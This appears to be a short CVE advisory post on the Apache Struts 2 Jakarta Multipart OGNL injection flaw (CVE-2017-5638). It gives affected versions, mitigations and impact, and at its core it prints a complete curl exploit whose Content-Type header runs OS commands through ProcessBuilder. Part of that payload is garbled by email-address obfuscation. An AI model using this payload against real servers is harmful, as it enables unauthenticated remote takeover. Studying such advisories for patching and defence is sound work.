Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical remote code execution flaw stemming from flawed error handling in the Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header value to a server processing file uploads. If the header value is invalid, the parser attempts to generate an error message. However, it incorrectly interprets the header’s value using Object-Graph Navigation Language (OGNL) expressions. An attacker can embed OGNL expressions within the `Content-Type` header itself. When the parser fails and tries to include the malicious header string in the error message, it evaluates the embedded OGNL code. Since OGNL execution has the power to interact with the underlying Java application and operating system, this allows an attacker to run arbitrary system commands with the same privileges as the Struts application server, leading to full system compromise without requiring authentication.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch released 2017-03-07

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/struts2-showcase/fileupload/doUpload.action`

How Exploit:

Craft malicious Content-Type header.

Targets file upload endpoints.

Triggers OGNL evaluation.

Executes arbitrary OS commands.

Protection from this CVE

Apply vendor patch.

Upgrade Struts version.

Use input validation filters.

Disable file upload functionality.

Impact:

Full server compromise.

Data breach.

Complete system control.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top